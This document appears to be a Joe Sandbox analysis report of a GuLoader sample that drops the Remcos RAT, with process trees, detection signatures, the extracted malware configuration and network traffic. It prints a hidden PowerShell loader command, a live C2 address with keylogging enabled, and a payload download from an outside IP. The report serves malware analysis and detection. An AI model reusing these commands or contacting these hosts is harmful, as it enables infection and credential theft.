Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Uundgaaelige.exe

Overview

General Information

Sample name:Uundgaaelige.exe
Analysis ID:1473335
MD5:fc55407cc82612103c5971dca1837d6b
SHA1:01efa90009900c64c846b7ac716dea3c5f97c4e8
SHA256:c9736cdc4ade9fddb9b293e0366f182f972154d98169b58e532b7905c310bf97
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Uundgaaelige.exe (PID: 8196 cmdline: "C:\Users\user\Desktop\Uundgaaelige.exe" MD5: FC55407CC82612103C5971DCA1837D6B)
    • powershell.exe (PID: 8572 cmdline: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wab.exe (PID: 8740 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8944 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5328 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2236 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7972 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1920 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1188 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4768 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3652 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8124 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3648 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4080 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • WerFault.exe (PID: 508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "172.93.222.25:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-P99HFC", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 8 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8740, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv", ProcessId: 8944, ProcessName: wab.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8572, TargetFilename: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales), CommandLine: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Uundgaaelige.exe", ParentImage: C:\Users\user\Desktop\Uundgaaelige.exe, ParentProcessId: 8196, ParentProcessName: Uundgaaelige.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales), ProcessId: 8572, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 8740, TargetFilename: C:\ProgramData\remcos\logs.dat

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "172.93.222.25:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-P99HFC", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for domain / URL
              Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 10%Perma Link
              Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
              Source: http://geoplugin.net/json.gpVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exeVirustotal: Detection: 13%Perma Link
              Multi AV Scanner detection for submitted file
              Source: Uundgaaelige.exeVirustotal: Detection: 13%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Uundgaaelige.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Uundgaaelige.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: qm.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405861
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_0040639C FindFirstFileA,FindClose,4_2_0040639C
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_004026F8 FindFirstFileA,4_2_004026F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 172.93.222.25
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: global trafficHTTP traffic detected: GET /HMKcAbwpOCo117.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 209.90.237.48Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: global trafficHTTP traffic detected: GET /HMKcAbwpOCo117.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 209.90.237.48Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000C.00000003.216342776684.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216343943505.00000000031F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000C.00000003.216342776684.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216343943505.00000000031F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000F.00000002.216863019101.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.216861546047.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217168034841.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login0 equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000F.00000002.216863019101.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.216861546047.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217168034841.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login0 equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000007.00000002.216287356676.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000007.00000002.216287356676.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: wab.exe, 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C2A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.
              Source: Uundgaaelige.exe, Uundgaaelige.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Uundgaaelige.exe, Uundgaaelige.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
